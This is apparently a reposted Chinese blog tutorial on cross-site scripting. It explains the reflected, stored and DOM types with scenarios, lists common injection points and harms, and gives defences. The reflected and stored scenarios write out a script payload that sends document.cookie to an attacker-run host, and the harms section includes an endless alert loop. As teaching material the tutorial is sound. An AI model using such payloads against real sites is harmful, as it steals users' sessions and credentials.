一、定义
XSS(Cross Site Scripting)
,翻译过来就是跨站脚本。指的是在用户浏览器上,在渲染DOM树的时候,执行了不可预期的JS脚本,从而发生了安全问题。
XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。
二、XSS类型
反射型XSS
(你提交的恶意数据成功的实现了XSS,但是仅仅是对你这次访问产生了影响,是非持久型攻击)。
存储型XSS
(你提交的数据成功的实现了XSS,存入了数据库或者写入日志,别人访问这个页面的时候就会自动触发)。
DOM型XSS
是一种基于网页DOM结构的攻击,该攻击特点是中招的人是少数人。
三、XSS场景
场景1、反射型XSS
1、当张三登录xxx.com后,我发现它的页面某些内容是根据url中的一个叫content参数直接显示的,猜测它测页面处理可能是这样,其它语言类似:
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<!DOCTYPEhtmlPUBLIC"-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><title>XSS测试</title></head><body>
页面内容:<%=request.getParameter("content")%>
<!-- 有的页面也常用document.write(' ')输出内容 --></body></html>
即页面内容直接回显请求链接的参数值。
2、然后张三从某处知道了阿伟也注册了该网站,并且知道其手机号码/邮箱,
3、然后张三做了一个超链接发给阿伟,超链接地址为:
http://www.xxx.com?content=<script>window.open(“www.bbb.com?param=”+document.cookie)</script>
4、当阿伟点击这个链接的时候(假设他已经登录xxx.com),浏览器就会直接打开bbb.com,并且把Tom在xxx.com中的cookie信息发送到bbb.com。
5、bbb.com是张三搭建的网站,当张三的网站接收到该信息时,张三就盗取了阿伟在xxx.com的cookie信息,cookie信息中可能存有登录密码,攻击成功!
6、这个过程中,受害者只有阿伟自己(攻击特点是中招的人是少数人)。当然,最后阿伟夸张三很刑。
反射型XSS特点是:攻击是一次性的,仅对当次访问产生影响。这种攻击经过后端,不经过数据库。在此攻击过程中,数据走向为:浏览器——>后端回显——>浏览器,故称为反射型。
场景2、存储型XSS
1、张三看到网站(假设是CSDN类发布文章的网站)可以发文章,然后发了一篇凉爽网图的文章。
2、文章某处包含了恶意代码,
<script>window.open(“www.bbb.com?param=”+document.cookie)</script>
,保存文章。
3、这时有缘人(怨种)Tom和Jack看到了这篇文章,点进来就都中招了,他们的cookie信息都发送到了我的服务器上,攻击成功!
4、这个过程中,受害者是多个人。( Stored XSS漏洞危害性更大,危害面更广)
存储型XSS特点是会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在。这种攻击经过后端,经过数据库。在此攻击过程中,数据走向为:浏览器—>后端—>数据库—>后端—>浏览器。
场景3、DOM型XSS
DOM XSS直接通过javascript执行,程序并不会返回后台进行处理
常见于类似JSON转换、翻译等工具区
<script>functiontest(){var str = document.getElementById("text").value;
document.getElementById("t").innerHTML ="<a href='"+str+"' >testLink</a>";}</script><div id="t"></div><input type="text" id="text" value=""/><input type="button" id="s" value="write" onclick="test()"/>
DOM型XSS特点是不经过后端,通过URL传参触发。在此攻击过程中,数据走向为:URL——>浏览器。
四、常见XSS会出现在什么地方?
重灾区:评论区、留言区、个人信息、订单信息等
针对型:站内信、网页即时通讯、私信、意见反馈
存在风险:搜索框、当前目录、图片属性等
存储型XSS会出现在什么地方?
任何可能插入数据库的地方
比如:用户注册的时候
留言板
上传文件的文件名
(管理员可见的)报错信息
……
五、反射型XSS、存储型XSS及DOM型XSS的区别
1、被攻击对象的不同
反射型XSS的被攻击对象一般是攻击者去寻找的,比如场景一的张三盗取阿伟的信息,所以这种攻击范围不是特别的广。
存储型XSS是广撒网的方式或者指定的方式,就是攻击者将存储型XSS放在一些有XSS漏洞的网站上,只要有用户访问这个链接就会中招,而攻击者也可以寻找被攻击对象,比如说上面的例子,所以我们可以看出,存储型XSS的危害性更大,范围更广,可以不需要寻找被攻击对象,只要存储型XSS在服务器上就能实施攻击。
六、XSS危害
危害1、信息泄露
- 盗用cookie,窃取敏感信息(包括但不限于账号密码、个人信息)
危害2、未授权操作
- 利用iframe、frame、XMLHttpRequest或flash等方式,以(被攻击)用户的身份执行一些管理操作,如发文章、发私信、加好友甚至转账等非法行为
- 利用可被攻击的域受到其他域信任的特点,以受信任来源的身份请求一些平时不允许的操作,如进行不当的投票活动
危害3、按键记录和钓鱼
- 记录用户在浏览器的操作
- 伪造登录框获取账号密码等信息
危害4、影响体验
- 恶意跳转
- 无法关闭的弹窗
while(true){alert('你关不掉我!');}
七、XSS防御
(未查看整理~)
- 对用户向服务器提交的信息(URL、关键字、HTTP头、POST数据等)进行检查,仅接受规定长度、适当格式、预期内容,其余的一律过滤。
- 尽量采用POST而非GET提交表单,任何内容输出到页面之前都必须加以en-code,避免显示出htmltag
- 对用户提交的信息中的link,检查是否有重定向回本站或不是真的图片等可以操作
- 输出前,对关键词或关键字符等进行编码转义的操作
1、使用可以转义处理在页面上显示的文本的函数,如PHP的htmlentities()或是htmlspecialchars(),Node.js的node-validator2、strip_tags(),用于过滤输入和输出中的恶意标签3、header(),用于控制json数据的头部(header("Content-type:application/json"))4、urlencode(),用于输出处理字符型参数代入页面链接中5、intval(),用于处理数值型参数输出页面中
- 做session标记、HTTP头检查,以防功能被第三方网站执行
- 确定接收到的内容被规范化,仅包含最小最安全的tag(不含JavaScript),去掉对任何远程内容的引用(尤其是样式表和JavaScript),使用httpOnly的cookie,设置httpOnly为true
- cookie防盗,避免直接在cookie中泄露用户隐私,例如email、密码等;通过使cookie和系统IP绑定来降低cookie泄露后的危险
八、更多知识
浏览器遵循同源策略(Same Origin Policy)
同源策略:同域名|IP、同端口、同协议 —— 共用cookie。浏览器的同源策略,认为同一个网站,访问同一个东西,限制了不同源的Js,对当前页面的资源和属性的权限。同源策略保护了a.com域名下的资源不被来自其他网页的脚本读取或篡改。- 腾讯博客: 驱散前端安全梦魇——DOMXSS典型场景分析与修复指南 https://security.tencent.com/index.php/blog/msg/107
版权归原作者 liu_bees 所有, 如有侵权,请联系我们删除。